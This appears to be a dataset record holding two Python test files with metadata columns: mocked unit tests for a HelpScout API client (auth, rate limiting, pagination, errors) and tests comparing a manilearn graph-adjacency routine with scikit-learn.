patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.delete.return_value = MagicMock()
response.status_code = 204
response.ok = True
response.json.return_value = {'a': 'b'}
ret = list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 204)'),
]
)
requests.delete.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_not_called()
pages.assert_not_called()
self.assertEqual(ret, [None])
def test_hit_patch_ok(self):
endpoint, method = 'users', 'patch'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.patch.return_value = MagicMock()
response.status_code = 204
response.ok = True
response.json.return_value = {'a': 'b'}
ret = list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 204)'),
]
)
requests.patch.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_not_called()
pages.assert_not_called()
self.assertEqual(ret, [None])
def test_hit_token_expired(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
type(response).ok = PropertyMock(side_effect=[False, True])
type(response).status_code = PropertyMock(side_effect=[401, 200])
response.json.return_value = json_response = {'a': 'b'}
list(hs.hit_(endpoint, method))
# Asserts
self.assertEqual(auth_headers.call_count, 2)
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (False - 401)'),
call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
self.assertEqual(
requests.get.call_args_list,
[call(full_url, headers=headers, json=None) for _ in range(2)])
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
auth.assert_called_once()
def test_hit_rate_limit_exceeded(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
type(response).ok = PropertyMock(side_effect=[False, True])
type(response).status_code = PropertyMock(side_effect=[429, 200])
response.json.return_value = json_response = {'a': 'b'}
list(hs.hit_(endpoint, method))
# Asserts
self.assertEqual(auth_headers.call_count, 2)
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (False - 429)'),
call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
self.assertEqual(
requests.get.call_args_list,
[call(full_url, headers=headers, json=None) for _ in range(2)])
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
rate_limit.assert_called_once()
auth.assert_not_called()
def test_hit_exception(self):
    """An unexpected error status (500) makes hit_ raise immediately.

    Unlike 401/429, a 500 is neither re-authenticated nor retried:
    HelpScoutException is raised after the first GET, the body is not
    parsed and no pagination happens.
    """
    endpoint, method = 'users', 'get'
    full_url = self.url + endpoint
    hs_path = 'helpscout.client.HelpScout.'
    hs = self._get_client(token='abc')
    with patch('helpscout.client.requests') as requests, \
            patch('helpscout.client.logger') as logger, \
            patch(hs_path + '_authenticate') as auth, \
            patch(hs_path + '_authentication_headers') as auth_headers, \
            patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit, \
            patch(hs_path + '_results_with_pagination') as pages:
        # Setup: the 200 side-effect values would serve a retry, but a
        # 500 must abort before any second request is made.
        auth_headers.return_value = headers = {'token': 'abc'}
        response = requests.get.return_value = MagicMock()
        response.text = 'Error message from help scout'
        type(response).ok = PropertyMock(side_effect=[False, True])
        type(response).status_code = PropertyMock(side_effect=[500, 200])
        response.json.return_value = {'a': 'b'}
        # Call
        with self.assertRaises(HelpScoutException):
            list(hs.hit_(endpoint, method))
        # Asserts
        auth_headers.assert_called_once()
        log_msg_body = method + ' ' + full_url
        self.assertEqual(
            logger.debug.call_args_list,
            [call('Request: ' + log_msg_body),
             call('Received: ' + log_msg_body + ' (False - 500)'),
             ])
        requests.get.assert_called_once_with(
            full_url, headers=headers, json=None)
        response.json.assert_not_called()
        pages.assert_not_called()
        rate_limit.assert_not_called()
        auth.assert_not_called()
def test_pagination_no_embedded(self):
    """A payload without the embedded key is yielded back unchanged."""
    client = self._get_client(token='abc')
    payload = {'msg': 'welcome to help scout'}
    results = list(client._results_with_pagination(payload, 'get'))
    self.assertEqual(results, [payload])
def test_pagination_embedded_single(self):
    """A single embedded dict with no next page yields just that dict."""
    client = self._get_client(token='abc')
    payload = {EmbeddedKey: {'msg': 'hello', '_links': {'next': None}}}
    results = list(client._results_with_pagination(payload, 'get'))
    self.assertEqual(results, [payload[EmbeddedKey]])
def test_pagination_embedded_list(self):
    """An embedded list with no next page yields each item in order."""
    client = self._get_client(token='abc')
    items = [{'msg': 'hello'}, {'msg': 'bye'}]
    payload = {EmbeddedKey: items, '_links': {'next': None}}
    results = list(client._results_with_pagination(payload, 'get'))
    self.assertEqual(results, items)
def test_pagination_embedded_next_page_ok(self):
    """Pagination follows 'next' hrefs until one is None.

    The seed response carries two embedded items plus a next link; two
    follow-up GETs (both 200) each contribute their embedded items and
    the last page's next link is None, ending iteration.
    """
    method = 'get'
    # Seed page, already fetched by the caller.
    response_value = {
        EmbeddedKey: [
            {'msg': 'hello'},
            {'msg': 'bye'},
        ],
        '_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
    }
    # Two further pages served by the mocked requests.get.
    responses_values = [
        {EmbeddedKey: [
            {'msg': 'blink 1'},
            {'msg': 'blink 2'},
        ],
         '_links': {'next':
                    {'href': 'http://helpscout.com/next_page/111'}}},
        {EmbeddedKey: [
            {'msg': 'see ya'},
        ],
         '_links': {'next': None}},
    ]
    # Every embedded item, in page order.
    expected = (response_value[EmbeddedKey] +
                responses_values[0][EmbeddedKey] +
                responses_values[1][EmbeddedKey])
    hs = self._get_client(token='abc')
    hs_path = 'helpscout.client.HelpScout.'
    with patch('helpscout.client.requests') as requests, \
            patch('helpscout.client.logger') as logger, \
            patch(hs_path + '_authenticate') as auth, \
            patch(hs_path + '_authentication_headers') as auth_headers, \
            patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit:
        # Setup
        auth_headers.return_value = headers = {'token': 'abc'}
        responses = [
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[0])),
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[1])),
        ]
        requests.get.side_effect = responses
        # Call
        ret = list(hs._results_with_pagination(response_value, method))
        # Asserts
        self.assertEqual(ret, expected)
        self.assertEqual(auth_headers.call_count, 2)  # one per follow-up GET
        self.assertEqual(
            logger.debug.call_args_list,
            [call(method + ' ' + response_value['_links']['next']['href']),
             call(method + ' ' + responses_values[0]['_links']['next'][
                 'href'])])
        self.assertEqual(
            requests.get.call_args_list,
            [call(response_value['_links']['next']['href'],
                  headers=headers),
             call(responses_values[0]['_links']['next']['href'],
                  headers=headers)
             ])
        responses[0].json.assert_called_once()
        responses[1].json.assert_called_once()
        auth.assert_not_called()        # no 401 occurred
        rate_limit.assert_not_called()  # no 429 occurred
def test_pagination_embedded_next_page_token_expired(self):
    """A 401 mid-pagination triggers re-auth and a retry of that page.

    The first follow-up GET returns 401, so _authenticate runs and the
    same URL is requested again; the retry and the final page both
    return 200 and all embedded items are still yielded in order.
    """
    method = 'get'
    response_value = {
        EmbeddedKey: [
            {'msg': 'hello'},
            {'msg': 'bye'},
        ],
        '_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
    }
    responses_values = [
        {EmbeddedKey: [
            {'msg': 'blink 1'},
            {'msg': 'blink 2'},
        ],
         '_links': {'next':
                    {'href': 'http://helpscout.com/next_page/111'}}},
        {EmbeddedKey: [
            {'msg': 'see ya'},
        ],
         '_links': {'next': None}},
    ]
    # The 401 attempt contributes nothing; results are unaffected.
    expected = (response_value[EmbeddedKey] +
                responses_values[0][EmbeddedKey] +
                responses_values[1][EmbeddedKey])
    hs = self._get_client(token='abc')
    hs_path = 'helpscout.client.HelpScout.'
    with patch('helpscout.client.requests') as requests, \
            patch('helpscout.client.logger') as logger, \
            patch(hs_path + '_authenticate') as auth, \
            patch(hs_path + '_authentication_headers') as auth_headers, \
            patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit:
        # Setup: first response is the 401, then the retried page, then
        # the final page.
        auth_headers.return_value = headers = {'token': 'abc'}
        responses = [
            MagicMock(ok=False, status_code=401,
                      json=MagicMock(return_value=responses_values[0])),
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[0])),
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[1])),
        ]
        requests.get.side_effect = responses
        # Call
        ret = list(hs._results_with_pagination(response_value, method))
        # Asserts
        self.assertEqual(ret, expected)
        self.assertEqual(auth_headers.call_count, 3)  # one per GET attempt
        self.assertEqual(
            logger.debug.call_args_list,
            # The first URL is logged twice: original attempt + retry.
            [call(method + ' ' + response_value['_links']['next']['href']),
             call(method + ' ' + response_value['_links']['next']['href']),
             call(method + ' ' + responses_values[0]['_links']['next'][
                 'href'])])
        self.assertEqual(
            requests.get.call_args_list,
            [call(response_value['_links']['next']['href'],
                  headers=headers),
             call(response_value['_links']['next']['href'],
                  headers=headers),
             call(responses_values[0]['_links']['next']['href'],
                  headers=headers)
             ])
        # NOTE(review): unlike the 429 twin test below, this test never
        # asserts responses[0].json.assert_not_called() — consider
        # adding it for symmetry.
        responses[1].json.assert_called_once()
        responses[2].json.assert_called_once()
        auth.assert_called_once()
        rate_limit.assert_not_called()
def test_pagination_embedded_next_page_rate_limit_exceeded(self):
    """A 429 mid-pagination invokes the rate-limit handler and retries.

    The first follow-up GET returns 429, so _handle_rate_limit_exceeded
    runs and the same URL is requested again; no re-authentication
    happens and all embedded items are still yielded in order.
    """
    method = 'get'
    response_value = {
        EmbeddedKey: [
            {'msg': 'hello'},
            {'msg': 'bye'},
        ],
        '_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
    }
    responses_values = [
        {EmbeddedKey: [
            {'msg': 'blink 1'},
            {'msg': 'blink 2'},
        ],
         '_links': {'next':
                    {'href': 'http://helpscout.com/next_page/111'}}},
        {EmbeddedKey: [
            {'msg': 'see ya'},
        ],
         '_links': {'next': None}},
    ]
    # The 429 attempt contributes nothing; results are unaffected.
    expected = (response_value[EmbeddedKey] +
                responses_values[0][EmbeddedKey] +
                responses_values[1][EmbeddedKey])
    hs = self._get_client(token='abc')
    hs_path = 'helpscout.client.HelpScout.'
    with patch('helpscout.client.requests') as requests, \
            patch('helpscout.client.logger') as logger, \
            patch(hs_path + '_authenticate') as auth, \
            patch(hs_path + '_authentication_headers') as auth_headers, \
            patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit:
        # Setup: first response is the 429, then the retried page, then
        # the final page.
        auth_headers.return_value = headers = {'token': 'abc'}
        responses = [
            MagicMock(ok=False, status_code=429,
                      json=MagicMock(return_value=responses_values[0])),
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[0])),
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[1])),
        ]
        requests.get.side_effect = responses
        # Call
        ret = list(hs._results_with_pagination(response_value, method))
        # Asserts
        self.assertEqual(ret, expected)
        self.assertEqual(auth_headers.call_count, 3)  # one per GET attempt
        self.assertEqual(
            logger.debug.call_args_list,
            # The first URL is logged twice: original attempt + retry.
            [call(method + ' ' + response_value['_links']['next']['href']),
             call(method + ' ' + response_value['_links']['next']['href']),
             call(method + ' ' + responses_values[0]['_links']['next'][
                 'href'])])
        self.assertEqual(
            requests.get.call_args_list,
            [call(response_value['_links']['next']['href'],
                  headers=headers),
             call(response_value['_links']['next']['href'],
                  headers=headers),
             call(responses_values[0]['_links']['next']['href'],
                  headers=headers)
             ])
        responses[0].json.assert_not_called()  # 429 body is never parsed
        responses[1].json.assert_called_once()
        responses[2].json.assert_called_once()
        auth.assert_not_called()  # a 429 is not an auth failure
        rate_limit.assert_called_once()
def test_pagination_exception(self):
    """An unexpected status (500) while paginating raises.

    Only the first follow-up GET happens; its 500 status triggers
    HelpScoutException and the remaining prepared responses stay
    unused.
    """
    method = 'get'
    response_value = {
        EmbeddedKey: [
            {'msg': 'hello'},
            {'msg': 'bye'},
        ],
        '_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
    }
    responses_values = [
        {EmbeddedKey: [
            {'msg': 'blink 1'},
            {'msg': 'blink 2'},
        ],
         '_links': {'next':
                    {'href': 'http://helpscout.com/next_page/111'}}},
        {EmbeddedKey: [
            {'msg': 'see ya'},
        ],
         '_links': {'next': None}},
    ]
    hs = self._get_client(token='abc')
    hs_path = 'helpscout.client.HelpScout.'
    with patch('helpscout.client.requests') as requests, \
            patch('helpscout.client.logger'), \
            patch(hs_path + '_authenticate'), \
            patch(hs_path + '_authentication_headers') as auth_headers, \
            patch(hs_path + '_handle_rate_limit_exceeded'):
        # Setup: the 500 aborts before the 200 responses are consumed.
        auth_headers.return_value = {'token': 'abc'}
        responses = [
            MagicMock(ok=False, status_code=500,
                      json=MagicMock(return_value=responses_values[0])),
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[0])),
            MagicMock(ok=True, status_code=200,
                      json=MagicMock(return_value=responses_values[1])),
        ]
        requests.get.side_effect = responses
        # Call
        with self.assertRaises(HelpScoutException):
            list(hs._results_with_pagination(response_value, method))
def test_authenticate_ok(self):
    """A successful token request stores the returned access token."""
    client = self._get_client()
    token_url = self.url + 'oauth2/token'
    expected_payload = {
        'grant_type': 'client_credentials',
        'client_id': self.app_id,
        'client_secret': self.app_secret,
    }
    token_body = {'access_token': 'kakaroto'}
    with patch('helpscout.client.requests') as requests, \
            patch('helpscout.client.logger') as logger:
        # Fake a 2xx token response.
        fake_response = MagicMock()
        fake_response.ok = True
        fake_response.json.return_value = token_body
        requests.post.return_value = fake_response
        client._authenticate()
        # Request, logging and token storage all happened as expected.
        logger.debug.assert_called_with('post ' + token_url)
        requests.post.assert_called_with(token_url, data=expected_payload)
        fake_response.json.assert_called_once()
        self.assertEqual(client.access_token, token_body['access_token'])
def test_authenticate_bad(self):
    """A failed token request raises and leaves access_token unset."""
    client = self._get_client()
    token_url = self.url + 'oauth2/token'
    expected_payload = {
        'grant_type': 'client_credentials',
        'client_id': self.app_id,
        'client_secret': self.app_secret,
    }
    token_body = {'access_token': 'kakaroto'}
    with patch('helpscout.client.requests') as requests, \
            patch('helpscout.client.logger') as logger:
        # Fake a non-2xx token response.
        fake_response = MagicMock()
        fake_response.ok = False
        fake_response.json.return_value = token_body
        requests.post.return_value = fake_response
        # Call
        with self.assertRaises(HelpScoutAuthenticationException):
            client._authenticate()
        # The request was made and logged, but the body was never read.
        logger.debug.assert_called_with('post ' + token_url)
        requests.post.assert_called_with(token_url, data=expected_payload)
        fake_response.json.assert_not_called()
        self.assertEqual(client.access_token, None)
def test_authentication_headers(self):
    """Headers carry the bearer token plus JSON content metadata."""
    client = self._get_client(token='kakaroto')
    self.assertEqual(
        client._authentication_headers(),
        {
            'Authorization': 'Bearer kakaroto',
            'content-type': 'application/json',
            'charset': 'UTF-8',
        })
def test_handle_rate_limit_exceeded_sleep(self):
    """With sleeping enabled, a warning is logged and we sleep it off."""
    client = self._get_client()
    with patch('helpscout.client.time') as time, \
            patch('helpscout.client.logger') as logger:
        client._handle_rate_limit_exceeded()
    logger.warning.assert_called_with('Rate limit exceeded.')
    time.sleep.assert_called_with(self.seconds)
def test_handle_rate_limit_exceeded_exception(self):
    """With sleeping disabled, the rate-limit handler raises instead."""
    client = self._get_client(sleep=False)
    with patch('helpscout.client.time') as time, \
            patch('helpscout.client.logger') as logger:
        with self.assertRaises(HelpScoutRateLimitExceededException):
            client._handle_rate_limit_exceeded()
    logger.warning.assert_called_with('Rate limit exceeded.')
    time.sleep.assert_not_called()
def test_getattr_requester_get(self):
    """`hs.users.get(...)` hits the endpoint and wraps the results."""
    endpoint, params = 'users', {'id': '10', 'name': 'Mike'}
    client = self._get_client()
    with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
            patch('helpscout.client.HelpScout.hit_') as hit:
        cls = MagicMock()
        HelpScoutObject.cls.return_value = cls
        hit.return_value = hit_return = 9
        getattr(client, endpoint).get(params=params)
        HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
        hit.assert_called_with(endpoint, 'get', None, params=params)
        cls.from_results.assert_called_with(hit_return)
def test_getattr_requester_delete_resource_id(self):
    """`hs.users.delete(resource_id=...)` hits without wrapping results."""
    endpoint, resource_id = 'users', 10
    client = self._get_client()
    with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
            patch('helpscout.client.HelpScout.hit_') as hit:
        cls = MagicMock()
        HelpScoutObject.cls.return_value = cls
        hit.return_value = (x for x in range(1))
        getattr(client, endpoint).delete(resource_id=resource_id)
        hit.assert_called_with(endpoint, 'delete', resource_id=resource_id)
        HelpScoutObject.cls.assert_not_called()
        cls.from_results.assert_not_called()
def test_getattr_requester_http_get_values(self):
    """Accessing ``.get`` on a requester yields a partial of get_objects."""
    client = self._get_client()
    requester = client.conversations
    getter = requester.get
    self.assertIsInstance(requester, HelpScoutEndpointRequester)
    self.assertEqual(requester.endpoint, 'conversations')
    self.assertIsInstance(getter, partial)
    self.assertEqual(getter.func.__self__, client)
    self.assertEqual(getter.func.__name__, 'get_objects')
def test_getattr_requester_http_put_values(self):
    """Accessing ``.put`` yields a partial bound to the requester itself."""
    client = self._get_client()
    requester = client.conversations
    putter = requester.put
    self.assertIsInstance(requester, HelpScoutEndpointRequester)
    self.assertEqual(requester.endpoint, 'conversations')
    self.assertIsInstance(putter, partial)
    self.assertEqual(putter.func.__self__, requester)
    self.assertEqual(putter.func.__name__, '_yielded_function')
def test_getattr_requester_resource(self):
    """Indexing a requester addresses one resource by its id."""
    client = self._get_client()
    resource_requester = client.conversations[910]
    self.assertIsInstance(
        resource_requester, HelpScoutEndpointRequester)
    self.assertEqual(resource_requester.client, client)
    self.assertEqual(resource_requester.endpoint, 'conversations/910')
def test_getattr_requester_resource_attribute(self):
    """Attribute access on a resource requester appends a subendpoint."""
    client = self._get_client()
    tags_requester = client.conversations[910].tags
    self.assertIsInstance(tags_requester, HelpScoutEndpointRequester)
    self.assertEqual(tags_requester.client, client)
    self.assertEqual(tags_requester.endpoint, 'conversations/910/tags')
if __name__ == '__main__':
    # Allow running this test module directly as a script.
    main()
| 45.779279
| 79
| 0.568877
| 4,136
| 40,652
| 5.301741
| 0.043762
| 0.0472
| 0.047428
| 0.023942
| 0.900036
| 0.86743
| 0.85685
| 0.837833
| 0.826204
| 0.817174
| 0
| 0.007972
| 0.318066
| 40,652
| 887
| 80
| 45.830891
| 0.783024
| 0.006716
| 0
| 0.763682
| 0
| 0
| 0.126063
| 0.064507
| 0
| 0
| 0
| 0
| 0.205224
| 1
| 0.044776
| false
| 0
| 0.006219
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f2032119c30b4674a4cc4ed890a1ff746d8c01cc
| 7,063
|
py
|
Python
|
tests/test_graph.py
|
jejjohnson/kernellib
|
eb9f80c1b605c8a6b5e8a324efd4ef07d8f59050
|
[
"MIT"
] | 1
|
2021-02-04T08:52:04.000Z
|
2021-02-04T08:52:04.000Z
|
tests/test_graph.py
|
jejjohnson/kernellib
|
eb9f80c1b605c8a6b5e8a324efd4ef07d8f59050
|
[
"MIT"
] | null | null | null |
tests/test_graph.py
|
jejjohnson/kernellib
|
eb9f80c1b605c8a6b5e8a324efd4ef07d8f59050
|
[
"MIT"
] | 1
|
2018-04-17T06:42:09.000Z
|
2018-04-17T06:42:09.000Z
|
"""
General and conceptual tests for graph routines
Date Created : Tuesday, 7th February, 2017
Author : J. Emmanuel Johnson
Email : emanjohnson91@gmail.com
Most of the tests here are based on the scikit-learn library.
Rather than reinvent the wheel, these tests reuse what scikit-learn
already provides; they mainly ensure that the 'wrapper' routine
outputs the same results as the scikit-learn implementation.
"""
from nose.tools import assert_equal
import numpy as np
from sklearn.neighbors import NearestNeighbors
from manilearn.utils.graph import adjacency
# adjacency matrix - k-nearest neighbors test
def test_adjacency_k_brute_connect():
    """
    Adjacency Matrix k-Nearest Neighbors test.

    Checks that ``adjacency`` reproduces sklearn's ``kneighbors_graph``
    for a binary (connectivity) kNN graph.
    """
    # import data
    data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    # set default parameters
    n_neighbors = 5
    algorithm = 'brute'
    method = 'knn'
    # sklearn adjacency matrix
    nbrs = NearestNeighbors(n_neighbors=n_neighbors,
                            algorithm=algorithm).fit(data)
    sklearn_mat = nbrs.kneighbors_graph(data)
    sklearn_mat = sklearn_mat.toarray()
    # my routine
    my_mat = adjacency(data,
                       n_neighbors=n_neighbors,
                       algorithm=algorithm,
                       method=method)
    my_mat = my_mat.toarray()
    # Assert the matrices are equal ELEMENTWISE.  The original compared
    # ``a.all() == b.all()``, which collapses each matrix to a single
    # boolean and passes for almost any pair of matrices.
    np.testing.assert_allclose(sklearn_mat, my_mat,
                               err_msg='Distance values comparison.')
def test_adjacency_k_brute_heat():
    """
    Adjacency Matrix k-Nearest Neighbors test (heat-kernel weights).

    Checks that ``adjacency`` with ``weight='heat'`` matches sklearn's
    ``kneighbors_graph`` with the heat kernel applied to its distances.
    """
    # import data
    data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    # set default parameters
    n_neighbors = 5
    algorithm = 'brute'
    method = 'knn'
    weight = 'heat'
    adjacency_kwargs = {'gamma': 1.0}
    gamma = 1.0
    # sklearn adjacency matrix with heat-kernel weighting
    nbrs = NearestNeighbors(n_neighbors=n_neighbors,
                            algorithm=algorithm).fit(data)
    sklearn_mat = nbrs.kneighbors_graph(data)
    sklearn_mat.data = np.exp(-sklearn_mat.data**2 / gamma**2)
    sklearn_mat = sklearn_mat.toarray()
    # my routine
    my_mat = adjacency(data,
                       n_neighbors=n_neighbors,
                       algorithm=algorithm,
                       method=method,
                       weight=weight,
                       adjacency_kwargs=adjacency_kwargs)
    my_mat = my_mat.toarray()
    # Assert the matrices are equal ELEMENTWISE.  The original compared
    # ``a.all() == b.all()``, which collapses each matrix to a single
    # boolean and passes for almost any pair of matrices.
    np.testing.assert_allclose(sklearn_mat, my_mat,
                               err_msg='Distance values comparison.')
def test_adjacency_k_brute_angle():
    """
    Adjacency Matrix k-Nearest Neighbors test (angle weights).

    Checks that ``adjacency`` with ``weight='angle'`` matches sklearn's
    ``kneighbors_graph`` with the angle transform applied.
    """
    # import data
    data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    # set default parameters
    n_neighbors = 5
    algorithm = 'brute'
    method = 'knn'
    weight = 'angle'
    # sklearn adjacency matrix with angle weighting
    nbrs = NearestNeighbors(n_neighbors=n_neighbors,
                            algorithm=algorithm).fit(data)
    sklearn_mat = nbrs.kneighbors_graph(data)
    sklearn_mat.data = np.exp(-np.arccos(1-sklearn_mat.data))
    sklearn_mat = sklearn_mat.toarray()
    # my routine
    my_mat = adjacency(data,
                       n_neighbors=n_neighbors,
                       algorithm=algorithm,
                       method=method,
                       weight=weight)
    my_mat = my_mat.toarray()
    # Assert the matrices are equal ELEMENTWISE.  The original compared
    # ``a.all() == b.all()``, which collapses each matrix to a single
    # boolean and passes for almost any pair of matrices.
    np.testing.assert_allclose(sklearn_mat, my_mat,
                               err_msg='Distance values comparison.')
# adjacency matrix - radius-nearest neighbors test
def test_adjacency_r_brute_connect():
    """
    Adjacency Matrix radius-Nearest Neighbors test.

    Checks that ``adjacency`` reproduces sklearn's
    ``radius_neighbors_graph`` for a binary (connectivity) radius graph.
    """
    # import data
    data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    # set default parameters
    radius = 1.5
    algorithm = 'brute'
    method = 'radius'
    # sklearn adjacency matrix
    nbrs = NearestNeighbors(radius=radius,
                            algorithm=algorithm).fit(data)
    sklearn_mat = nbrs.radius_neighbors_graph(data)
    sklearn_mat = sklearn_mat.toarray()
    # my routine
    my_mat = adjacency(data,
                       radius=radius,
                       algorithm=algorithm,
                       method=method)
    my_mat = my_mat.toarray()
    # Assert the matrices are equal ELEMENTWISE.  The original compared
    # ``a.all() == b.all()``, which collapses each matrix to a single
    # boolean and passes for almost any pair of matrices.
    np.testing.assert_allclose(sklearn_mat, my_mat,
                               err_msg='Distance values comparison.')
def test_adjacency_r_brute_heat():
    """
    Adjacency Matrix radius-Nearest Neighbors test (heat-kernel weights).

    Checks that ``adjacency`` with ``weight='heat'`` matches sklearn's
    ``radius_neighbors_graph`` with the heat kernel applied.
    """
    # import data
    data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    # set default parameters
    radius = 1.5
    algorithm = 'brute'
    method = 'radius'
    weight = 'heat'
    adjacency_kwargs = {'gamma': 1.0}
    gamma = 1.0
    # sklearn adjacency matrix with heat-kernel weighting
    nbrs = NearestNeighbors(radius=radius,
                            algorithm=algorithm).fit(data)
    sklearn_mat = nbrs.radius_neighbors_graph(data)
    sklearn_mat.data = np.exp(-sklearn_mat.data**2 / gamma**2)
    sklearn_mat = sklearn_mat.toarray()
    # my routine
    my_mat = adjacency(data,
                       radius=radius,
                       algorithm=algorithm,
                       method=method,
                       weight=weight,
                       adjacency_kwargs=adjacency_kwargs)
    my_mat = my_mat.toarray()
    # Assert the matrices are equal ELEMENTWISE.  The original compared
    # ``a.all() == b.all()``, which collapses each matrix to a single
    # boolean and passes for almost any pair of matrices.
    np.testing.assert_allclose(sklearn_mat, my_mat,
                               err_msg='Distance values comparison.')
def test_adjacency_r_brute_angle():
    """
    Adjacency Matrix radius-Nearest Neighbors test (angle weights).

    Checks that ``adjacency`` with ``weight='angle'`` matches sklearn's
    ``radius_neighbors_graph`` with the angle transform applied.
    """
    # import data
    data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    # set default parameters
    radius = 1.5
    algorithm = 'brute'
    method = 'radius'
    weight = 'angle'
    # sklearn adjacency matrix with angle weighting
    nbrs = NearestNeighbors(radius=radius,
                            algorithm=algorithm).fit(data)
    sklearn_mat = nbrs.radius_neighbors_graph(data)
    sklearn_mat.data = np.exp(-np.arccos(1-sklearn_mat.data))
    sklearn_mat = sklearn_mat.toarray()
    # my routine
    my_mat = adjacency(data,
                       radius=radius,
                       algorithm=algorithm,
                       method=method,
                       weight=weight)
    my_mat = my_mat.toarray()
    # Assert the matrices are equal ELEMENTWISE.  The original compared
    # ``a.all() == b.all()``, which collapses each matrix to a single
    # boolean and passes for almost any pair of matrices.
    np.testing.assert_allclose(sklearn_mat, my_mat,
                               err_msg='Distance values comparison.')
# TODO: test adjacency
# check parameters:
# * algorithms - annoy, ball_tree, lshf, kd_tree,
# pyflann, cyflann (k, radius)
# * default: nearest_neighbor_kwargs
# * default: adjacency_kwargs
# TODO: test create_adjacency
# check parameters:
# * distances
# * indices
# * weight - heat, angle
# * weight_kwargs
# TODO: test create_constraint
# check parameters:
# * adjacency_matrix
# * constraint - degree, identity, k-scaling
# * laplacian_matrix (for K-Scaling)
# TODO: test create_laplacian
# TODO: maximum
| 28.479839
| 75
| 0.605692
| 840
| 7,063
| 4.940476
| 0.15119
| 0.077108
| 0.047229
| 0.011566
| 0.802651
| 0.799759
| 0.768434
| 0.766024
| 0.766024
| 0.766024
| 0
| 0.02013
| 0.282599
| 7,063
| 247
| 76
| 28.595142
| 0.798895
| 0.266884
| 0
| 0.915254
| 0
| 0
| 0.049105
| 0
| 0
| 0
| 0
| 0.004049
| 0.059322
| 1
| 0.050847
| false
| 0
| 0.033898
| 0
| 0.084746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
